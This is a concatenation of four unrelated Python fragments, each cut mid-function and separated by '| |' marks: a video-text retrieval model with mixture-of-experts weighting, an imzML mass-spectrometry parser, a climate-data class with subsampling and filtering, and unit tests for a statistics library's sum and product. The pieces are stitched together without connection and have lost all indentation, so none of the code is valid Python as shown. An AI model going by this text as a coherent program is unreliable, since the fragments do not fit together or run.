# n for the corresponding text inputs, (but we should switch to GN)
use_bns = [True for modality in self.modalities]
# NOTE: When use_ce is not used, the text features are projected to
# subspaces of different dimensions. When use_ce is used, they must all
# be projected to `same_dim` (to allow fusion). The only excpetion is for an
# ablation in which we mimic the `same_dim` reduction to measure whether this
# projection influences overall performance.
self.trn_list = nn.ModuleList()
self.repeat_temporal = {}
for mod in modalities:
self.repeat_temporal[mod] = 1
if self.trn_cat == 2:
print("Performing concat between random temporal attention")
for mod in self.trn_config.keys():
img_feature_dim = expert_dims[mod][0] # 365
num_frames = self.trn_config[
mod] # This is exatcly how many different attention
num_frames = 1 # mimic simple avg and max based on segments
# num_class = expert_dims[mod][0]
self.trn_list += [TemporalAttention(img_feature_dim, num_frames)]
self.repeat_temporal[mod] = num_frames + 2
elif self.trn_cat == 1:
print("Performing concat between segments")
for mod in self.trn_config.keys():
img_feature_dim = expert_dims[mod][0] # 365
num_frames = self.trn_config[mod] # hard code
num_class = expert_dims[mod][0]
self.trn_list += [
RelationModuleMultiScale_Cat(img_feature_dim, num_frames, num_class)
]
self.repeat_temporal[mod] = len(
[i for i in range(num_frames, 1, -1)])
elif self.trn_cat == 0:
print("Performing Conventional TRN (sum) segments")
for mod in self.trn_config.keys():
img_feature_dim = expert_dims[mod][0] # 365
num_frames = self.trn_config[mod] # hard code
num_class = expert_dims[mod][0]
self.trn_list += [
RelationModuleMultiScale(img_feature_dim, num_frames,
num_class)
]
else:
raise NotImplementedError()
in_dims = [expert_dims[mod][0] * self.repeat_temporal[mod] for mod in modalities]
agg_dims = [expert_dims[mod][1] * self.repeat_temporal[mod] for mod in modalities]
if self.use_ce or self.mimic_ce_dims:
dim_reducers = [ReduceDim(in_dim, same_dim) for in_dim in in_dims]
self.video_dim_reduce = nn.ModuleList(dim_reducers)
if self.use_ce:
# The g_reason module has a first layer that is specific to the design choice
# (e.g. triplet vs pairwise), then a shared component which is common to all
# designs.
if self.use_ce in {"pairwise", "pairwise-star", "triplet"}:
num_inputs = 3 if self.use_ce == "triplet" else 2
self.g_reason_1 = nn.Linear(same_dim * num_inputs, same_dim)
elif self.use_ce == "pairwise-star-specific":
num_inputs = 2
g_reason_unshared_weights = [G_reason(same_dim, num_inputs, self.non_lin)
for mod in modalities]
self.g_reason_unshared_weights = nn.ModuleList(g_reason_unshared_weights)
elif self.use_ce in {"pairwise-star-tensor"}:
reduce_dim = self.reduce_dim
self.dim_reduce = nn.Linear(same_dim, reduce_dim)
self.g_reason_1 = nn.Linear(self.reduce_dim * reduce_dim, same_dim)
else:
raise ValueError(f"unrecognised CE config: {self.use_ce}")
g_reason_shared = []
for _ in range(self.num_g_layers - 1):
if self.use_bn_reason:
g_reason_shared.append(nn.BatchNorm1d(same_dim))
g_reason_shared.append(self.non_lin)
g_reason_shared.append(nn.Linear(same_dim, same_dim))
self.g_reason_shared = nn.Sequential(*g_reason_shared)
h_reason = []
for _ in range(self.num_h_layers):
if self.use_bn_reason:
h_reason.append(nn.BatchNorm1d(same_dim))
h_reason.append(self.non_lin)
h_reason.append(nn.Linear(same_dim, same_dim))
self.h_reason = nn.Sequential(*h_reason)
gated_vid_embds = [GatedEmbeddingUnitReasoning(same_dim) for _ in in_dims]
text_out_dims = [same_dim for _ in agg_dims]
elif self.mimic_ce_dims: # ablation study
gated_vid_embds = [MimicCEGatedEmbeddingUnit(same_dim, same_dim, use_bn=True)
for _ in modalities]
text_out_dims = [same_dim for _ in agg_dims]
elif self.concat_mix_experts: # ablation study
# use a single large GEU to mix the experts - the output will be the sum
# of the aggregation sizes
in_dim, out_dim = sum(in_dims), sum(agg_dims)
gated_vid_embds = [GatedEmbeddingUnit(in_dim, out_dim, use_bn=True)]
elif self.concat_experts: # ablation study
# We do not use learnable parameters for the video combination, (we simply
# use a high dimensional inner product).
gated_vid_embds = []
else:
gated_vid_embds = [GatedEmbeddingUnit(in_dim, dim, use_bn) for
in_dim, dim, use_bn in zip(in_dims, agg_dims, use_bns)]
text_out_dims = agg_dims
self.video_GU = nn.ModuleList(gated_vid_embds)
if "retrieval" in self.task:
if self.concat_experts:
gated_text_embds = [nn.Sequential()]
elif self.concat_mix_experts:
# As with the video inputs, we similiarly use a single large GEU for the
# text embedding
gated_text_embds = [GatedEmbeddingUnit(text_dim, sum(agg_dims),
use_bn=True)]
else:
gated_text_embds = [GatedEmbeddingUnit(text_dim, dim, use_bn=True) for
dim in text_out_dims]
self.text_GU = nn.ModuleList(gated_text_embds)
else:
print("V. simple classifier, should update....")
total_dim = 0
for mod in self.expert_dims.keys():
total_dim += self.expert_dims[mod][1] * self.repeat_temporal[mod]
print(f"Total dim is {total_dim}")
self.classifier = nn.Linear(total_dim, self.num_classes)
def compute_moe_weights(self, text, ind):
# compute weights for all captions (including when assigned K captions to
# the same video)
B, K, D = text.shape
M = len(self.modalities)
msg = f"expected between 1 and 10 modalities, found {M} ({self.modalities})"
assert 1 <= M <= 10, msg
# Treat each caption independently in the softmax (which runs over modalities)
text = text.view(B * K, D)
if self.freeze_weights:
moe_weights = self.moe_weights.repeat(B, K, 1)
if text.is_cuda:
moe_weights = moe_weights.cuda()
else:
# if False:
# print("USING BIGGER WEIGHT PREDS")
# moe_weights = self.moe_fc_bottleneck1(text)
# moe_weights = self.moe_cg(moe_weights)
# moe_weights = self.moe_fc_proj(moe_weights)
# moe_weights = moe_weights * 1
# else:
moe_weights = self.moe_fc(text) # BK x D -> BK x M
moe_weights = F.softmax(moe_weights, dim=1)
moe_weights = moe_weights.view(B, K, M)
if self.verbose:
print("--------------------------------")
for idx, key in enumerate(self.modalities):
msg = "{}: mean: {:.3f}, std: {:.3f}, min: {:.3f}, max: {:.3f}"
msg = msg.format(
key,
moe_weights[:, :, idx].mean().item(),
moe_weights[:, :, idx].std().item(),
moe_weights[:, :, idx].min().item(),
moe_weights[:, :, idx].max().item(),
)
print(msg)
return moe_weights
def forward(self, text, experts, ind, raw_captions):
"""Compute joint embeddings | |
from the .ibd file is needed (getspectrum calls will not work)
"""
ImzMLParserBase.__init__(self)
t_start = time.time()
# custom map sizes are currently not supported, therefore mapsize is hardcoded.
# ElementTree requires the schema location for finding tags (why?) but
# fails to read it from the root element. As this should be identical
# for all imzML files, it is hard-coded here and prepended before every tag
self.sl = "{http://psi.hupo.org/ms/mzml}"
# maps each imzML number format to its struct equivalent
self.precisionDict = dict(PRECISION_DICT)
# maps each number format character to its amount of bytes used
self.sizeDict = dict(SIZE_DICT)
self.filename = filename
self.root = None
self.mzGroupId = self.intGroupId = None
self._parse_lib = parse_lib
# select iterator
self.__iter_read_spectrum_meta()
# get binary data handle
if ibd_file is None:
# name of the binary file
ibd_filename = self._infer_bin_filename(self.filename)
self.ibd_filename = ibd_filename
elif isinstance(ibd_file, str):
self.ibd_filename = ibd_file
else:
if hasattr(ibd_file, "name"):
self.ibd_filename = ibd_file.name
else:
raise ValueError("The `ibd_file` signature was changed. Please provide filename or open object")
# Dict for basic imzML metadata other than those required for reading spectra. See method __readimzmlmeta()
self.imzmldict = self.__read_imzml_metadata()
self.imzmldict["max count of pixels z"] = np.asarray(self.coordinates)[:, 2].max()
# multi-core support for image generation
self._as_threads = as_threads
self._pool_size = 2 if self._as_threads else pool_size
# setup executor
self.executor = (
ThreadPoolExecutor(self._pool_size) if self._as_threads else ProcessPoolExecutor(self._pool_size)
)
self.root = None
LOGGER.debug(f"Initialized parser in {format_time(time.time()-t_start)}")
@staticmethod
def _infer_bin_filename(imzml_path):
imzml_path = Path(imzml_path)
ibd_path = [
f
for f in imzml_path.parent.glob("*")
if re.match(r".+\.ibd", str(f), re.IGNORECASE) and f.stem == imzml_path.stem
][0]
return str(ibd_path)
def __iter_read_spectrum_meta(self):
"""
This method should only be called by __init__. Reads the data formats, coordinates and offsets from
the .imzML file and initializes the respective attributes. While traversing the XML tree, the per-spectrum
metadata is pruned, i.e. the <spectrumList> element(s) are left behind empty.
Supported accession values for the number formats: "MS:1000521", "MS:1000523", "IMS:1000141" or
"IMS:1000142". The string values are "32-bit float", "64-bit float", "32-bit integer", "64-bit integer".
"""
mz_group = int_group = None
# get iterator
iterparse = choose_iterparse(self._parse_lib)
elem_iterator = iterparse(self.filename, events=("start", "end"))
slist = None
_, self.root = next(elem_iterator)
for event, elem in elem_iterator:
if elem.tag == self.sl + "spectrumList" and event == "start":
slist = elem
elif elem.tag == self.sl + "spectrum" and event == "end":
self.__process_spectrum(elem)
slist.remove(elem)
elif elem.tag == self.sl + "referenceableParamGroup" and event == "end":
for param in elem:
if param.attrib["name"] == "m/z array":
self.mzGroupId = elem.attrib["id"]
mz_group = elem
elif param.attrib["name"] == "intensity array":
self.intGroupId = elem.attrib["id"]
int_group = elem
# cleanup
self.__assign_precision(int_group, mz_group)
self.__fix_offsets()
LOGGER.debug("Setup metadata")
def __fix_offsets(self):
"""Fix errors introduced by incorrect signed 32bit integers when unsigned 64bit was appropriate"""
def fix(array):
fixed = []
delta = 0
prev_value = float("nan")
for value in array:
if value < 0 <= prev_value:
delta += 2 ** 32
fixed.append(value + delta)
prev_value = value
return fixed
self.mzOffsets = fix(self.mzOffsets)
self.intensityOffsets = fix(self.intensityOffsets)
LOGGER.debug("Fixed offsets")
def __assign_precision(self, int_group, mz_group):
valid_accession_strings = (
"MS:1000521",
"MS:1000523",
"IMS:1000141",
"IMS:1000142",
"MS:1000519",
"MS:1000522",
)
mz_precision = int_precision = None
for s in valid_accession_strings:
param = mz_group.find('%scvParam[@accession="%s"]' % (self.sl, s))
if param is not None:
mz_precision = self.precisionDict[param.attrib["name"]]
break
for s in valid_accession_strings:
param = int_group.find('%scvParam[@accession="%s"]' % (self.sl, s))
if param is not None:
int_precision = self.precisionDict[param.attrib["name"]]
break
if (mz_precision is None) or (int_precision is None):
raise RuntimeError("Unsupported number format: mz = %s, int = %s" % (mz_precision, int_precision))
self.mzPrecision, self.intensityPrecision = mz_precision, int_precision
LOGGER.debug("Setup precision")
def __process_spectrum(self, elem):
array_list_item = elem.find("%sbinaryDataArrayList" % self.sl)
element_list = list(array_list_item)
element_list_sorted = [None, None]
for element in element_list:
ref = element.find("%sreferenceableParamGroupRef" % self.sl).attrib["ref"]
if ref == self.mzGroupId:
element_list_sorted[0] = element
elif ref == self.intGroupId:
element_list_sorted[1] = element
mz_offset_elem = element_list_sorted[0].find('%scvParam[@accession="IMS:1000102"]' % self.sl)
self.mzOffsets.append(int(mz_offset_elem.attrib["value"]))
mz_length_elem = element_list_sorted[0].find('%scvParam[@accession="IMS:1000103"]' % self.sl)
self.mzLengths.append(int(mz_length_elem.attrib["value"]))
intensity_offset_elem = element_list_sorted[1].find('%scvParam[@accession="IMS:1000102"]' % self.sl)
self.intensityOffsets.append(int(intensity_offset_elem.attrib["value"]))
intensity_length_elem = element_list_sorted[1].find('%scvParam[@accession="IMS:1000103"]' % self.sl)
self.intensityLengths.append(int(intensity_length_elem.attrib["value"]))
try:
tic = elem.find('%scvParam[@accession="MS:1000285"]' % self.sl).attrib["value"]
self.ticArray.append(float(tic))
except AttributeError:
pass
scan_elem = elem.find("%sscanList/%sscan" % (self.sl, self.sl))
x = scan_elem.find('%scvParam[@accession="IMS:1000050"]' % self.sl).attrib["value"]
y = scan_elem.find('%scvParam[@accession="IMS:1000051"]' % self.sl).attrib["value"]
try:
z = scan_elem.find('%scvParam[@accession="IMS:1000052"]' % self.sl).attrib["value"]
self.coordinates.append((int(x), int(y), int(z)))
except AttributeError:
self.coordinates.append((int(x), int(y), 1))
def __read_imzml_metadata(self):
"""
This method should only be called by __init__. Initializes the imzmldict with frequently used metadata from
the .imzML file.
This method reads only a subset of the available meta information and may be extended in the future. The keys
are named similarly to the imzML names. Currently supported keys: "max dimension x", "max dimension y",
"pixel size x", "pixel size y", "matrix solution concentration", "wavelength", "focus diameter x",
"focus diameter y", "pulse energy", "pulse duration", "attenuation".
If a key is not found in the XML tree, it will not be in the dict either.
:return d:
dict containing above mentioned meta data
:rtype:
dict
:raises Warning:
if an xml attribute has a number format different from the imzML specification
"""
def _check_meta(param, accession, elem_list):
for idx, _ in enumerate(param):
acc, attr = accession[idx]
elem = elem_list.find('.//%scvParam[@accession="%s"]' % (self.sl, acc))
if elem is None:
break
name, T = param[idx]
try:
metadata_dict[name] = T(elem.attrib[attr])
except ValueError:
warn(Warning('Wrong data type in XML file. Skipped attribute "%s"' % name))
metadata_dict = {}
scan_settings_list_elem = self.root.find("%sscanSettingsList" % self.sl)
instrument_config_list_elem = self.root.find("%sinstrumentConfigurationList" % self.sl)
supported_params_1 = [
("max count of pixels x", int),
("max count of pixels y", int),
("max dimension x", int),
("max dimension y", int),
("pixel size x", float),
("pixel size y", float),
("matrix solution concentration", float),
]
supported_params_2 = [
("wavelength", float),
("focus diameter x", float),
("focus diameter y", float),
("pulse energy", float),
("pulse duration", float),
("attenuation", float),
]
supported_accession_1 = [
("IMS:1000042", "value"),
("IMS:1000043", "value"),
("IMS:1000044", "value"),
("IMS:1000045", "value"),
("IMS:1000046", "value"),
("IMS:1000047", "value"),
("MS:1000835", "value"),
]
supported_accession_2 = [
("MS:1000843", "value"),
("MS:1000844", "value"),
("MS:1000845", "value"),
("MS:1000846", "value"),
("MS:1000847", "value"),
("MS:1000848", "value"),
]
_check_meta(supported_params_1, supported_accession_1, scan_settings_list_elem)
_check_meta(supported_params_2, supported_accession_2, instrument_config_list_elem)
return metadata_dict
def get_ion_image(p, mz_value, tol=0.1, z=1, reduce_func=sum):
"""Get an image representation of the intensity distribution of the ion with specified m/z value.
By default, the intensity values within the tolerance region are summed.
:param p:
the ImzMLParser (or anything else with similar attributes) for the desired dataset
:param mz_value:
m/z value for which the ion image shall be returned
:param tol:
Absolute tolerance for the m/z value, such that all ions with values
mz_value-|tol| <= x <= mz_value+|tol| are included. Defaults to 0.1
:param z:
z Value if spectrogram is 3-dimensional.
:param reduce_func:
the behaviour for reducing the intensities between mz_value-|tol| and mz_value+|tol| to a single value. Must
be a function that takes a sequence as input and outputs a number. By default, the values are summed.
:return:
numpy matrix with each element representing the ion intensity in this
pixel. Can be easily plotted with matplotlib
"""
tol = abs(tol)
im = np.zeros((p.imzmldict["max count of pixels y"], p.imzmldict["max count of pixels x"]))
for i, (x, y, z_) in enumerate(p.coordinates):
if z_ == 0:
UserWarning("z coordinate = 0 present, if you're getting blank images set getionimage(.., .., z=0)")
if z_ == z:
mzs, ints = map(lambda x: np.asarray(x), p.get_spectrum(i))
min_i, max_i = bisect_spectrum(mzs, mz_value, tol)
im[y - 1, x - 1] = reduce_func(ints[min_i : max_i + 1])
return im
# keep alias to previously named functions
getionimage = get_ion_image
def reshape_image(array, coordinates, shape) -> np.ndarray:
"""Reshape image according to the coordinates"""
assert len(array) == len(coordinates), "Input array has different size/shape than the coordinate list"
im = np.zeros(shape)
for (value, (x, y, z_)) in zip(array, coordinates):
im[y - 1, x - 1] = value
return im
def _get_ion_image(p, mz_value, tol, z, reduce_func, coordinates, start_idx):
"""Utility method used by multi-core/thread image reader"""
tol = abs(tol)
im = np.zeros((p.imzmldict["max count of pixels y"], p.imzmldict["max count of pixels x"]))
for i, (x, y, z_) in enumerate(coordinates, start=start_idx):
if z_ == 0:
UserWarning("z coordinate = 0 present, if you're getting blank images set getionimage(.., .., z=0)")
if z_ == z:
mzs, ints = map(lambda x: np.asarray(x), p.get_spectrum(i))
min_i, max_i = bisect_spectrum(mzs, | |
pool.map(self._interp_temporal, job_args)
del job_args
for i, j, res in job_result:
interp_data[:, i, j] = res
interp_data = np.squeeze(interp_data)
self.data = np.squeeze(self.data)
if use_to_data:
self.time = new_time.copy()
self.data = interp_data.copy()
else:
return interp_data, new_time
def _ascending_descending_lat_lons(self, lats = True, lons = False, direction = 'asc'):
"""
Transforms the data (and lats and lons) so that they have strictly ascending (direction = 'asc')
or descending (direction = 'des') order. (Needed for interpolation).
Returns True if manipulation took place.
"""
lat_flg, lon_flg = False, False
if np.all(np.diff(self.lats) < 0) and lats and direction == 'asc':
self.lats = self.lats[::-1]
self.data = self.data[..., ::-1, :]
lat_flg = True
elif np.all(np.diff(self.lats) > 0) and lats and direction == 'des':
self.lats = self.lats[::-1]
self.data = self.data[..., ::-1, :]
lat_flg = True
if np.all(np.diff(self.lons) < 0) and lons and direction == 'asc':
self.lons = self.lons[::-1]
self.data = self.data[..., ::-1]
lon_flg = True
elif np.all(np.diff(self.lons) > 0) and lons and direction == 'des':
self.lons = self.lons[::-1]
self.data = self.data[..., ::-1]
lon_flg = True
return lat_flg, lon_flg
def subsample_spatial(self, lat_to, lon_to, start, average = False):
"""
Subsamples the data in the spatial sense to grid "lat_to" x "lon_to" in degress.
Start is starting point for subsampling in degrees as [lat, lon]
If average is True, the subsampling is due to averaging the data -- using SciPy's spline
interpolation on the rectangle. The interpolation is done for each time step and level
independently.
If average is False, the subsampling is just subsampling certain values.
"""
if self.lats is not None and self.lons is not None:
delta_lats = np.abs(self.lats[1] - self.lats[0])
delta_lons = np.abs(self.lons[1] - self.lons[0])
if lat_to % delta_lats == 0 and lon_to % delta_lons == 0:
lat_ndx = int(lat_to // delta_lats)
lon_ndx = int(lon_to // delta_lons)
lat_flg, lon_flg = self._ascending_descending_lat_lons(lats = True, lons = True, direction = 'asc')
start_lat_ndx = np.where(self.lats == start[0])[0]
start_lon_ndx = np.where(self.lons == start[1])[0]
if start_lon_ndx.size == 1 and start_lat_ndx.size == 1:
start_lat_ndx = start_lat_ndx[0]
start_lon_ndx = start_lon_ndx[0]
if not average:
self.lats = self.lats[start_lat_ndx::lat_ndx]
self.lons = self.lons[start_lon_ndx::lon_ndx]
d = self.data
d = d[..., start_lat_ndx::lat_ndx, :]
self.data = d[..., start_lon_ndx::lon_ndx]
else:
nan_flag = False
if self.nans:
if self.check_NaNs_only_spatial():
# for interpolation purposes, fill NaNs with 0.
msk = np.isnan(self.data)
self.data[msk] = 0.
msk = msk[0, ...]
nan_flag = True
else:
raise Exception("NaNs in the data are not only spatial, cannot interpolate!")
from scipy.interpolate import RectBivariateSpline
# if data is single-level - create additional dummy dimension
if self.data.ndim == 3:
self.data = self.data[:, np.newaxis, :, :]
# fields for new lats / lons
new_lats = np.arange(start[0], self.lats[-1]+lat_to, lat_to)
new_lons = np.arange(start[1], self.lons[-1], lon_to)
d = np.zeros((list(self.data.shape[:2]) + [new_lats.shape[0], new_lons.shape[0]]))
# interpolate using Bivariate spline
for t in range(self.time.shape[0]):
for lvl in range(self.data.shape[1]):
int_scheme = RectBivariateSpline(self.lats, self.lons, self.data[t, lvl, ...])
d[t, lvl, ...] = int_scheme(new_lats, new_lons)
if nan_flag:
# subsample mask to new grid
msk_temp = msk[start_lat_ndx::lat_ndx, :]
msk = msk_temp[..., start_lon_ndx::lon_ndx]
# return back NaNs
for t in range(self.time.shape[0]):
for lvl in range(self.data.shape[1]):
d[t, lvl, msk] = np.nan
self.lats = new_lats
self.lons = new_lons
self.data = np.squeeze(d)
if np.any(np.isnan(self.data)):
self.nans = True
else:
self.nans = False
else:
raise Exception("Start lat and / or lon for subsampling does not exist in the data!")
self._ascending_descending_lat_lons(lats = lat_flg, lons = lon_flg, direction = 'des')
else:
raise Exception("Subsampling lats only to multiples of %.2f and lons of %.2f" % (delta_lats, delta_lons))
else:
raise Exception("Cannot subsample station data, or data from one grid point!")
def smoothing_running_avg(self, points, cut_edges = False, use_to_data = False, ts = None):
"""
Smoothing of time series using running average over points.
If use_to_data is False, returns the data, otherwise rewrites the data in class.
"""
if ts is None:
ts = self.data.copy()
if cut_edges:
d = np.zeros(([ts.shape[0] - points + 1] + list(ts.shape[1:])))
else:
d = np.zeros_like(ts)
window = points//2
for i in range(d.shape[0]):
if cut_edges:
d[i, ...] = np.nanmean(ts[i : i+points, ...], axis = 0)
else:
d[i, ...] = np.nanmean(ts[max(i-window,1) : min(i+window,d.shape[0]), ...], axis = 0)
if use_to_data and ts is None:
self.data = d.copy()
if cut_edges:
if points % 2 == 1:
# time slicing when points is odd -- cut points//2 from the beginning and from the end
self.time = self.time[points//2 : -points//2 + 1]
else:
# time slicing when points is even -- not sure where to cut
pass
else:
return d
def plot_FFT_spectrum(self, ts = None, log = True, vlines = np.arange(1,11), fname = None):
"""
Estimates power spectrum using Welch method.
if ts is None, plots spectrum of the data.
ts should have same sampling frequency as data!
y axis is log by default, if log is True, also x axis is log.
"""
import matplotlib.pyplot as plt
delta = self.time[1] - self.time[0]
if delta == 1:
# daily time series
fs = 1./86400 # Hz
elif abs(delta - 30) < 3.0:
# monthly time series
fs = 1./2.628e+6
elif abs(delta - 365) < 2.0:
# yearly time series
fs = 1./3.154e+7
plt.figure(figsize = (15,7))
plt.gca().spines['top'].set_visible(False)
plt.gca().spines['right'].set_visible(False)
plt.gca().spines['left'].set_visible(False)
ts = ts if ts is not None else self.data.copy()
if isinstance(ts, list):
ts = np.array(ts).T
if ts.ndim > 2:
ts = ts.reshape([ts.shape[0], np.prod(ts.shape[1:])])
fft = np.abs(np.fft.rfft(ts, axis = 0))
freqs = np.fft.rfftfreq(ts.shape[0], d = 1./fs)
freqs *= 3.154e+7
if log:
plt.semilogx(freqs, 20*np.log10(fft), linewidth = 0.8) # in dB hopefully...
plt.xlabel('FREQUENCY [log 1/year]', size = 25)
else:
plt.plot(freqs, 20*np.log10(fft), linewidth = 0.8)
plt.xlabel('FREQUENCY [1/year]', size = 25)
for vline in vlines:
plt.axvline(1./vline, 0, 1, linestyle = ':',linewidth = 0.6, color = "#333333")
plt.xlim([freqs[0], freqs[-1]])
plt.ylabel('FFT SPECTRUM [dB]', size = 25)
if fname is None:
plt.show()
else:
plt.savefig(fname, bbox_inches = 'tight')
def temporal_filter(self, cutoff, btype, ftype = 'butter', order = 2, cut = 1, pool = None, cut_time = False,
rp = None, rs = None, cut_data = False):
"""
Filters data in temporal sense.
Uses Butterworth filter of order order.
btype:
lowpass
highpass
bandpass
bandstop
cutoff:
for low/high pass one frequency in months
for band* list of frequencies in months
ftype:
butter - for Butterworth filter
cheby1 - for Chebyshev type I filter
cheby2 - for Chebyshev type II filter
ellip - for Cauer/elliptic filter
bessel - for Bessel/Thomson filter
cut in years
"""
from scipy.signal import iirfilter
delta = self.time[1] - self.time[0]
if delta == 1:
# daily time series
fs = 1./86400 # Hz
y = 365.25
elif abs(delta - 30) < 3.0:
# monthly time series
fs = 1./2.628e+6 # Hz
y = 12
nyq = 0.5 * fs # Nyquist frequency
if 'cheby' in ftype or 'ellip' == ftype:
rp = rp if rp is not None else 60
if type(cutoff) == list and btype in ['bandpass', 'bandstop']:
low = cutoff[0] if cutoff[0] > cutoff[1] else cutoff[1]
high = cutoff[1] if cutoff[0] > cutoff[1] else cutoff[0]
low = 1./(low*2.628e+6) # in months
high = 1./(high*2.628e+6)
# get coefficients
b, a = iirfilter(order, [low/nyq, high/nyq], rp = rp, rs = rs, btype = btype, analog = False, ftype = ftype)
elif btype in ['lowpass', 'highpass']:
cutoff = 1./(cutoff*2.628e+6)
b, a = iirfilter(order, cutoff/nyq, rp = rp, rs = rs, btype = btype, analog = False, ftype = ftype)
else:
raise Exception("For band filter cutoff must be a list of [low,high] for low/high-pass cutoff must be a integer!")
if pool is None:
map_func = map
elif pool is not None:
map_func = pool.map
if self.data.ndim > 1:
num_lats = self.lats.shape[0]
num_lons = self.lons.shape[0]
else:
num_lats = 1
num_lons = 1
self.data = self.data[:, np.newaxis, np.newaxis]
self.filtered_data = np.zeros_like(self.data)
job_args = [ (i, j, self.data[:, i, j], b, a) for i in range(num_lats) for j in range(num_lons) ]
job_result = map_func(self._get_filtered_data, job_args)
del job_args
for i, j, res in job_result:
self.filtered_data[:, i, j] = res
del job_result
if cut is not None:
to_cut = int(y*cut)
if cut_time:
self.time = self.time[to_cut:-to_cut]
if cut_data:
self.data | |
[3.3, 5.5, 6.6], [1e23, 2e23, 1e24]):
assert len(data) == 3
_ = self.func(data)
def testInPlaceModification(self):
# Test that the function does not modify its input data.
data = [3, 0, 5, 1, 7, 2]
# We wish to detect functions that modify the data in place by
# sorting, which we can't do if the data is already sorted.
assert data != sorted(data)
saved = data[:]
assert data is not saved
_ = self.func(data)
self.assertEqual(data, saved, "data has been modified")
def testOrderOfDataPoints(self):
# Test that the result of the function shouldn't depend on the
# order of data points. In practice, due to floating point
# rounding, it may depend slightly.
data = [1, 2, 2, 3, 4, 7, 9]
expected = self.func(data)
result = self.func(data[::-1])
self.assertApproxEqual(expected, result)
for i in range(10):
random.shuffle(data)
result = self.func(data)
self.assertApproxEqual(result, expected)
def get_allowed_kinds(self):
class MyList(list):
pass
class MyTuple(tuple):
pass
def generator(data):
return (obj for obj in data)
return (list, tuple, iter, MyList, MyTuple, generator)
def testTypeOfDataCollection(self):
# Test that the type of iterable data doesn't effect the result.
data = range(1, 16, 2)
expected = self.func(data)
for kind in self.get_allowed_kinds():
result = self.func(kind(data))
self.assertEqual(result, expected)
def testFloatTypes(self):
# Test that the type of float shouldn't effect the result.
class MyFloat(float):
def __add__(self, other):
return MyFloat(super().__add__(other))
__radd__ = __add__
def __mul__(self, other):
return MyFloat(super().__mul__(other))
__rmul__ = __mul__
data = [2.5, 5.5, 0.25, 1.0, 2.25, 7.0, 7.25]
expected = self.func(data)
data = [MyFloat(x) for x in data]
result = self.func(data)
self.assertEqual(result, expected)
# FIXME: needs tests for bad argument types.
class SumTest(NumericTestCase, UnivariateMixin):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.func = calcstats.sum
def testEmptyData(self):
# Override UnivariateMixin method.
for empty in ([], (), iter([])):
self.assertEqual(self.func(empty), 0)
for start in (Fraction(23, 42), Decimal('3.456'), 123.456):
self.assertEqual(self.func(empty, start), start)
def testCompareWithFSum(self):
# Compare with the math.fsum function.
data = [random.uniform(-500, 5000) for _ in range(1000)]
actual = self.func(data)
expected = math.fsum(data)
self.assertApproxEqual(actual, expected, rel=1e-15)
def testExactSeries(self):
# Compare with exact formulae for certain sums of integers.
# sum of 1, 2, 3, ... n = n(n+1)/2
data = list(range(1, 131))
random.shuffle(data)
expected = 130*131/2
self.assertEqual(self.func(data), expected)
# sum of squares of 1, 2, 3, ... n = n(n+1)(2n+1)/6
data = [n**2 for n in range(1, 57)]
random.shuffle(data)
expected = 56*57*(2*56+1)/6
self.assertEqual(self.func(data), expected)
# sum of cubes of 1, 2, 3, ... n = n**2(n+1)**2/4 = (1+2+...+n)**2
data1 = list(range(1, 85))
random.shuffle(data1)
data2 = [n**3 for n in data1]
random.shuffle(data2)
expected = (84**2*85**2)/4
self.assertEqual(self.func(data1)**2, expected)
self.assertEqual(self.func(data2), expected)
def testStartArgument(self):
# Test that the optional start argument works correctly.
data = [random.uniform(1, 1000) for _ in range(100)]
t = self.func(data)
for start in (42, -23, 1e20):
self.assertEqual(self.func(data, start), t+start)
def testFractionSum(self):
F = Fraction
# Same denominator (or int).
data = [F(3, 5), 1, F(4, 5), -F(7, 5), F(9, 5)]
start = F(1, 5)
expected = F(3, 1)
self.assertEqual(self.func(data, start), expected)
# Different denominators.
data = [F(9, 4), F(3, 7), 2, -F(2, 5), F(1, 3)]
start = F(1, 2)
expected = F(2147, 420)
self.assertEqual(self.func(data, start), expected)
def testDecimalSum(self):
D = Decimal
data = [D('0.7'), 3, -D('4.3'), D('2.9'), D('3.6')]
start = D('1.5')
expected = D('7.4')
self.assertEqual(self.func(data, start), expected)
def testFloatSubclass(self):
class MyFloat(float):
def __add__(self, other):
return MyFloat(super().__add__(other))
__radd__ = __add__
data = [1.25, 2.5, 7.25, 1.0, 0.0, 3.5, -4.5, 2.25]
data = map(MyFloat, data)
expected = MyFloat(13.25)
actual = self.func(data)
self.assertEqual(actual, expected)
self.assertTrue(isinstance(actual, MyFloat))
def testFloatSum(self):
data = [2.77, 4.23, 1.91, 0.35, 4.01, 0.57, -4.15, 8.62]
self.assertEqual(self.func(data), 18.31)
data = [2.3e19, 7.8e18, 1.0e20, 3.5e19, 7.2e19]
self.assertEqual(self.func(data), 2.378e20)
class SumTortureTest(NumericTestCase):
def testTorture(self):
# Variants on Tim Peters' torture test for sum.
func = calcstats.sum
self.assertEqual(func([1, 1e100, 1, -1e100]*10000), 20000.0)
self.assertEqual(func([1e100, 1, 1, -1e100]*10000), 20000.0)
self.assertApproxEqual(
func([1e-100, 1, 1e-100, -1]*10000), 2.0e-96, rel=1e-15, tol=0)
# === Test products ===
class RunningProductTest(unittest.TestCase, TestConsumerMixin):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.func = calcstats.running_product
def testProduct(self):
cr = self.func()
data = [3, 5, 1, -2, -0.5, 0.75]
expected = [3, 15, 15, -30, 15.0, 11.25]
assert len(data)==len(expected)
for x, y in zip(data, expected):
self.assertEqual(cr.send(x), y)
def testProductStart(self):
start = 1.275
cr = self.func(start)
data = [2, 5.5, -4, 1.0, -0.25, 1.25]
expected = [2, 11.0, -44.0, -44.0, 11.0, 13.75]
assert len(data)==len(expected)
for x, y in zip(data, expected):
self.assertEqual(cr.send(x), start*y)
def testFractions(self):
F = Fraction
data = [F(3, 5), 2, F(1, 4), F(5, 3)]
expected = [F(3, 5), F(6, 5), F(6, 20), F(1, 2)]
assert len(data)==len(expected)
start = F(1, 7)
rs = self.func(start)
for f, y in zip(data, expected):
x = rs.send(f)
self.assertEqual(x, start*y)
self.assertTrue(isinstance(x, Fraction))
def testDecimals(self):
D = Decimal
data = [D('0.4'), 4, D('2.5'), D('1.7')]
expected = [D('0.4'), D('1.6'), D('4.0'), D('6.8')]
assert len(data)==len(expected)
start = D('1.35')
rs = self.func(start)
for d, y in zip(data, expected):
x = rs.send(d)
self.assertEqual(x, start*y)
self.assertTrue(isinstance(x, Decimal))
class ProductTest(NumericTestCase, UnivariateMixin):
def __init__(self, *args, **kwargs):
